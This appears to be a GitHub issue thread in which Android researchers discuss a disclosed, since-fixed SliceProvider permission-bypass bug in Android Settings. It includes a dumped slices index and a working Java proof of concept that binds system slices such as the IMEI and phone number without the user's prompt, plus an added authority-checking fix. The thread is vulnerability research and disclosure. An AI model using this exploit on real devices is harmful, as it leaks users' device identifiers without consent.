Open heeeeen opened 4 years ago
In the original PoC provided to Google I've used `content://android.settings.slices/action/battery_saver`, but in general the bug could be used against any SliceProvider that doesn't care what URI authority (`android.settings.slices` in the above example) was requested.
The list of slices from system settings that can be accessed with this bug can be dumped from a rooted device once the system settings slices are indexed (that is, once any of them is accessed). You can use the official SliceViewer to view slices.
Normally, Slices can be accessed by the home screen and the assistant (the application selected to handle home key long press), and when another application tries to access a Slice it will receive a Slice with an Intent that can be used to request permission from the user. With this bug that permission prompt can be skipped and some Slices can be accessed, for example those from the list below (replace `battery_saver` in the URI specified above with the value from `key` to get their URI). There are a few other system settings Slices that are hardcoded in SettingsSliceProvider, but they are unaffected by this bug because they rely on URI authority matching.
$ adb shell "sqlite3 -line /data/user_de/0/com.android.settings/databases/slices_index.db 'SELECT * FROM slices_index;'"
key = phone_number
title = Phone number
summary =
screentitle = About emulated device
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
controller = com.android.settings.deviceinfo.PhoneNumberPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = imei_info
title = IMEI
summary =
screentitle = About emulated device
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
controller = com.android.settings.deviceinfo.imei.ImeiInfoPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = build_number
title = Build number
summary =
screentitle = About emulated device
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.aboutphone.MyDeviceInfoFragment
controller = com.android.settings.deviceinfo.BuildNumberPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = os_firmware_version
title = Android version
summary =
screentitle = Android version
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.firmwareversion.FirmwareVersionSettings
controller = com.android.settings.deviceinfo.firmwareversion.FirmwareVersionDetailPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = screen_magnification_gestures_preference_screen
title = Magnify with triple-tap
summary =
screentitle = Magnification
keywords =
icon = 0
fragment = com.android.settings.accessibility.MagnificationPreferenceFragment
controller = com.android.settings.accessibility.MagnificationGesturesPreferenceController
platform_slice = 0
slice_type = 1
unavailable_slice_subtitle =
key = battery_saver
title = Battery Saver
summary = Extend battery life
screentitle = Battery Saver
keywords =
icon = 0
fragment = com.android.settings.fuelgauge.batterysaver.BatterySaverSettings
controller = com.android.settings.fuelgauge.batterysaver.BatterySaverButtonPreferenceController
platform_slice = 1
slice_type = 1
unavailable_slice_subtitle =
key = remote_volume
title = Cast volume
summary =
screentitle = Sound
keywords =
icon = 2131231348
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.RemoteVolumePreferenceController
platform_slice = 0
slice_type = 2
unavailable_slice_subtitle =
key = media_volume
title = Media volume
summary =
screentitle = Sound
keywords =
icon = 2131231069
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.MediaVolumePreferenceController
platform_slice = 0
slice_type = 2
unavailable_slice_subtitle =
key = call_volume
title = Call volume
summary =
screentitle = Sound
keywords =
icon = 2131231059
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.CallVolumePreferenceController
platform_slice = 0
slice_type = 2
unavailable_slice_subtitle =
key = ring_volume
title = Ring volume
summary =
screentitle = Sound
keywords =
icon = 2131231216
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.RingVolumePreferenceController
platform_slice = 0
slice_type = 2
unavailable_slice_subtitle =
key = alarm_volume
title = Alarm volume
summary =
screentitle = Sound
keywords =
icon = 17302288
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.AlarmVolumePreferenceController
platform_slice = 0
slice_type = 2
unavailable_slice_subtitle =
key = vibrate_when_ringing
title = Vibrate for calls
summary =
screentitle = Sound
keywords =
icon = 0
fragment = com.android.settings.notification.SoundSettings
controller = com.android.settings.notification.VibrateWhenRingPreferenceController
platform_slice = 0
slice_type = 1
unavailable_slice_subtitle =
key = airplane_mode
title = Airplane mode
summary =
screentitle = Network & internet
keywords =
icon = 2131230932
fragment = com.android.settings.network.NetworkDashboardFragment
controller = com.android.settings.network.AirplaneModePreferenceController
platform_slice = 1
slice_type = 1
unavailable_slice_subtitle =
key = auto_rotate
title = Auto-rotate screen
summary =
screentitle = Display
keywords =
icon = 0
fragment = com.android.settings.DisplaySettings
controller = com.android.settings.display.AutoRotatePreferenceController
platform_slice = 0
slice_type = 1
unavailable_slice_subtitle =
key = gesture_double_tap_power
title = Jump to camera
summary = To quickly open camera, press the power button twice. Works from any screen.
screentitle = Jump to camera
keywords =
icon = 0
fragment = com.android.settings.gestures.DoubleTapPowerSettings
controller = com.android.settings.gestures.DoubleTapPowerPreferenceController
platform_slice = 0
slice_type = 1
unavailable_slice_subtitle =
key = notification_badging
title = Allow notification dots
summary =
screentitle = Notifications
keywords =
icon = 0
fragment = com.android.settings.notification.ConfigureNotificationSettings
controller = com.android.settings.notification.BadgingNotificationPreferenceController
platform_slice = 0
slice_type = 1
unavailable_slice_subtitle =
key = hardware_info_device_model
title = Model
summary =
screentitle = Model & hardware
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
controller = com.android.settings.deviceinfo.hardwareinfo.DeviceModelPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = hardware_info_device_serial
title = Serial number
summary =
screentitle = Model & hardware
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
controller = com.android.settings.deviceinfo.hardwareinfo.SerialNumberPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
key = hardware_info_device_revision
title = Hardware version
summary =
screentitle = Model & hardware
keywords =
icon = 0
fragment = com.android.settings.deviceinfo.hardwareinfo.HardwareInfoFragment
controller = com.android.settings.deviceinfo.hardwareinfo.HardwareRevisionPreferenceController
platform_slice = 0
slice_type = 0
unavailable_slice_subtitle =
Hi, Michal, Thank you so much for your detailed analysis!
Hi, Michal
Could you show me POC? I used the following code to call the SliceProvider directly
```java
Bundle b = new Bundle();
//b.putParcelable("slice_uri", ub.build());
// Provider that receives the call
Uri uriCall = Uri.parse("content://android.settings.slices");
// Slice URI passed in the "slice_uri" extra
Uri uri = Uri.parse("content://android.settings.slices/action/toggle_nfc");
b.putParcelable("slice_uri", uri);
ArrayList<SliceSpec> supportedSpecs = new ArrayList<SliceSpec>();
supportedSpecs.add(new SliceSpec("androidx.app.slice.LIST", 1));
supportedSpecs.add(new SliceSpec("androidx.slice.LIST", 1));
supportedSpecs.add(new SliceSpec("androidx.app.slice.BASIC", 1));
supportedSpecs.add(new SliceSpec("androidx.slice.BASIC", 1));
b.putParcelableArrayList("supported_specs", supportedSpecs);
//getContentResolver().call(ub.build(), "bind_slice", null, b);
Bundle responseBundle = getContentResolver().call(uriCall, "bind_slice", null, b);
Log.d("heen", responseBundle.getParcelable("slice").toString());
```
But I get:
```
12-25 19:44:13.658 25797 25797 D heen : slice:
12-25 19:44:13.658 25797 25797 D heen : image
12-25 19:44:13.658 25797 25797 D heen : text: Your Device wants to show Settings slices
12-25 19:44:13.658 25797 25797 D heen : int
12-25 19:44:13.658 25797 25797 D heen : slice:
12-25 19:44:13.658 25797 25797 D heen : image
12-25 19:44:13.658 25797 25797 D heen : action
```
It seems it still needs the user to grant the permission. Also, I found the fix, which checks the content provider authority. But how do you avoid specifying the `android.settings.slices` authority when calling the URI `content://android.settings.slices/action/battery_saver`?
Merry Christmas! Regards, En He
You'll need to replace the Uri authority (in `uri` in your code) to point to your own provider, as well as use `sliceManager.grantSlicePermission` to grant access to that Uri.
My code for that was:
```java
// Slice URI under the app's own authority; only the path names the Settings slice
static final Uri TARGET_URI =
        Uri.parse("content://com.example.sliceuri.myprovider/action/battery_saver");
// Provider that actually receives the "bind_slice" call
static final Uri PROVIDER_URI =
        Uri.parse("content://android.settings.slices");

private Slice doQuery() {
    SliceManager sliceManager = getSystemService(SliceManager.class);
    sliceManager.grantSlicePermission(getPackageName(), TARGET_URI);
    Bundle extras = new Bundle();
    extras.putParcelable("slice_uri", TARGET_URI);
    extras.putParcelableArrayList("supported_specs", new ArrayList<Parcelable>(Arrays.asList(
            new SliceSpec("androidx.slice.LIST", 1),
            new SliceSpec("androidx.app.slice.BASIC", 1),
            new SliceSpec("androidx.slice.BASIC", 1),
            new SliceSpec("androidx.app.slice.LIST", 1)
    )));
    Bundle result = getContentResolver().call(
            PROVIDER_URI,
            "bind_slice",
            null,
            extras
    );
    return result.getParcelable("slice");
}
```
You'll also need to declare a provider with authority `com.example.sliceuri.myprovider` in `AndroidManifest.xml`. This provider doesn't need to actually do anything; just returning `true` from `onCreate` is a sufficient implementation.
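The defensive counterpart of the authority check discussed in this thread, as an added example that is not part of the original thread or of the Android source: a SliceProvider base class that refuses to bind any slice URI not addressed to its own authority. The class name `AuthorityCheckedSliceProvider`, the hooks `expectedAuthority()` and `onBindVerifiedSlice()`, and the choice to return `null` for rejected URIs are assumptions made for illustration.

```java
import android.content.ContentResolver;
import android.net.Uri;
import android.util.Log;

import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.slice.Slice;
import androidx.slice.SliceProvider;

/** Hypothetical base class: binds a slice only for URIs addressed to this provider. */
public abstract class AuthorityCheckedSliceProvider extends SliceProvider {
    private static final String TAG = "AuthCheckedSlices";

    /** Assumption: the single authority declared for this provider in AndroidManifest.xml. */
    @NonNull
    protected abstract String expectedAuthority();

    /** Hypothetical hook: build the slice once the URI has been validated. */
    @Nullable
    protected abstract Slice onBindVerifiedSlice(@NonNull Uri sliceUri);

    /** True only for content:// URIs whose authority is exactly the given one. */
    static boolean isAddressedTo(@NonNull String authority, @Nullable Uri uri) {
        return uri != null
                && ContentResolver.SCHEME_CONTENT.equals(uri.getScheme())
                && authority.equals(uri.getAuthority());
    }

    @Override
    public final Slice onBindSlice(@NonNull Uri sliceUri) {
        // The caller picks the "slice_uri" extra independently of the provider it calls,
        // so a path such as /action/battery_saver says nothing about who owns the URI.
        if (!isAddressedTo(expectedAuthority(), sliceUri)) {
            Log.w(TAG, "Refusing to bind slice for foreign URI: " + sliceUri);
            return null;
        }
        return onBindVerifiedSlice(sliceUri);
    }
}
```

A provider that resolves slices purely from the URI path would subclass this and move its lookup into `onBindVerifiedSlice()`, so the path is only interpreted after the authority has matched.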
michal, Thanks for your help and happy new year! I reproduced successfully.
Hi, michal, Thank you again!
I found another bug when researching your bug. :) I was wondering if I could have other ways to reach you to talk about interesting Android bugs.
Send me an email, you can find my address in the `git log` of this repository (looks like GitHub doesn't show those in the web interface and apparently spam bots rarely index those).
Hi, michal
I just saw you got credited for another interesting bug about SliceProvider (https://android.googlesource.com/platform/frameworks/base/+/ce472cd14f7262a0f5b3ffe656af05ed673c8e08). I tried some research but got no result. It seems as if the attack could target some system slice provider like the one in Settings to get sensitive information? Could you give me some hint?
Thanks, heeeeen